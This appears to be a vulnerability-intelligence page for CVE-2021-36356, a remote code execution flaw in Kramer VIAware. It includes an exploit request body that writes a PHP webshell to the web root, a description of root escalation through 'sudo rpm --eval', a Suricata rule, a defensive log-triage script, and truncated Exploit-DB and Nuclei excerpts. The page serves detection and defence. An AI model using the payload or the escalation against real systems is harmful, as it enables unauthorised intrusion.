CVE-2021-36356
Published: 2021-08-31
Priority: P1 · 86 · critical · 9.8 (CVSS 3.1)
Tags: ITW · EXPLOIT · VulnCheck KEV · Exploited in the wild
EPSS: 54.39% (98.9th percentile)
KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames (even though browseSystemFiles.php is no longer reachable via the GUI). NOTE: this issue exists because of an incomplete fix for CVE-2019-17124.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kramerav | viaware | <= 2021-08 | — |
Detection & IOCs (extracted from sources)
Request body used by the Nuclei template (`{{randstr}}` is a template placeholder for a random filename):
otherradioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
Snort/Suricata rule (ET, sid:2036738):
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:38; content:"/ajaxPages/writeBrowseFilePathAjax.php"; fast_pattern; http.request_body; content:"radioBtnVal="; content:"associateFileName="; reference:cve,2021-36356; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:url,packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html; reference:url,write-up.github.io/kramerav/; reference:cve,2021-35064; classtype:attempted-admin; sid:2036738; rev:2; metadata:attack_target Server, created_at 2022_06_01, cve CVE_2021_35064_CVE_2021_36356, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2024_03_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- Detect POST requests to /ajaxPages/writeBrowseFilePathAjax.php with both 'radioBtnVal=' and 'associateFileName=' in the request body: this is the core exploit primitive for arbitrary file write.
- The exploit writes a PHP webshell to /var/www/html/ (e.g., test.php) via the associateFileName parameter; monitor for new .php files appearing in the Apache web root on VIAware appliances.
- Post-exploitation command execution is achieved via 'sudo rpm --eval' with embedded Lua os.execute calls; monitor for rpm processes spawned by the web server user with --eval arguments.
- The Nuclei template uses the MD5 hash '44f63b292601ec4ab0d8c3244c9f5ebe' (md5 of 'CVE-2021-35064') as a canary in the webshell response body to confirm successful exploitation; alert on this string in HTTP responses from VIAware hosts.
- The exploit URI for the exact vulnerable endpoint has a fixed byte size of 38 characters (/ajaxPages/writeBrowseFilePathAjax.php); use bsize matching in network signatures to reduce false positives.
- CVE-2021-36356 is an incomplete fix for CVE-2019-17124; the GUI entry point (browseSystemFiles.php) was removed but the underlying writable endpoint (writeBrowseFilePathAjax.php) remained accessible and unauthenticated.
- The exploit is unauthenticated and requires no prior access; the POST to writeBrowseFilePathAjax.php is directly reachable over HTTPS without credentials.
- The Snort/ET rule targets both CVE-2021-35064 and CVE-2021-36356 in a single signature (sid:2036738); defenders should be aware that a single alert may correspond to either CVE being exploited.
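The detection points above, as an added example that is not part of the original page or any vendor tooling: the ET signature's content matches (POST, exact 38-byte URI, both body parameters) are reproduced in plain Python so they can be run over request logs offline, and hits are triaged by whether the decoded associateFileName would land a .php file in the Apache web root. The request records are constructed samples, not real traffic.

```python
from urllib.parse import parse_qs

# Values taken from the page: the vulnerable endpoint (exactly 38 bytes, which is
# what the signature's bsize:38 checks) and the web root the webshell is dropped in.
VULN_URI = "/ajaxPages/writeBrowseFilePathAjax.php"
WEB_ROOT = "/var/www/html/"

# Constructed sample requests as (method, uri, body); not captured traffic.
SAMPLE_REQUESTS = [
    ("POST", VULN_URI, "radioBtnVal=1&associateFileName=%2Fvar%2Fwww%2Fhtml%2Fshell.php"),
    ("POST", VULN_URI, "radioBtnVal=1"),                          # one parameter only
    ("GET", VULN_URI, ""),                                         # wrong method
    ("POST", "/index.php", "radioBtnVal=1&associateFileName=x"),   # other endpoint
    ("POST", VULN_URI, "radioBtnVal=1&associateFileName=%2Ftmp%2Fnotes.txt"),
]


def matches_et_rule(method, uri, body):
    """True when a request satisfies every match of ET sid:2036738."""
    if method != "POST":
        return False
    # Suricata's http.uri buffer includes any query string, so bsize:38 only
    # matches the bare path; reproduce that exact-length check here.
    if len(uri) != 38 or uri != VULN_URI:
        return False
    return "radioBtnVal=" in body and "associateFileName=" in body


def webroot_php_target(body):
    """Return the decoded associateFileName if it points at a .php under the web root."""
    params = parse_qs(body, keep_blank_values=True)  # also percent-decodes values
    for path in params.get("associateFileName", []):
        if path.startswith(WEB_ROOT) and path.lower().endswith(".php"):
            return path
    return None


def triage(requests):
    """Yield (index, severity, target) for every request the signature fires on."""
    hits = []
    for i, (method, uri, body) in enumerate(requests):
        if not matches_et_rule(method, uri, body):
            continue
        target = webroot_php_target(body)
        hits.append((i, "high" if target else "medium", target))
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_REQUESTS):
        print(hit)
```

Feed real request logs as (method, uri, body) tuples; a "high" hit means the write target is a PHP file in the web root, which is the webshell case the bullets describe.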
CVSS provenance
- NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD v2.0: 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-qjp8-q2c4-mpmm · ghsa_unreviewed · 2022-05-24 · CVSS 9.8 CRITICAL · CWE-434
VulnCheck
kramerav viaware Unrestricted Upload of File with Dangerous Type
vulncheck · 2021 · CVSS 9.8 CRITICAL
Affected: kramerav viaware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/ma
Suricata
ET EXPLOIT Kramer VIAware Remote Code Execution (CVE-2021-35064 CVE-2021-36356)
suricata · 2022-06-01 · CVSS 9.8 CRITICAL
Rule: the ET signature (sid:2036738) quoted in full under Detection & IOCs above.
Exploit-DB
Kramer VIAware - Remote Code Execution (RCE) (Root)
exploitdb · 2022-04-07 · CVSS 9.8 CRITICAL

```python
# Exploit Title: Remote Code Execution as Root on KRAMER VIAware
# Date: 31/03/2022
# Exploit Author: sharkmoos
# Vendor Homepage: https://www.kramerav.com/
# Software Link: https://www.kramerav.com/us/product/viaware
# Version: *
# Tested on: ViaWare Go (Linux)
# CVE : CVE-2021-35064, CVE-2021-36356
import sys, urllib3
from requests import get, post

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def writeFile(host):
    headers = {
        "Host": f"{host}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Accept": "text/html, */*",
        "Accept-Language": "en-GB,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With
```
Nuclei
Kramer VIAware - Remote Code Execution
nuclei · CVSS 9.8 CRITICAL
KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
Template:

```yaml
id: CVE-2021-36356

info:
  name: Kramer VIAware - Remote Code Execution
  author: gy741
  severity: critical
  description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files to the web root, achieving remote code execution and complete server compromise.
  remediation: |
    Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web int
```
No writeups or analysis indexed.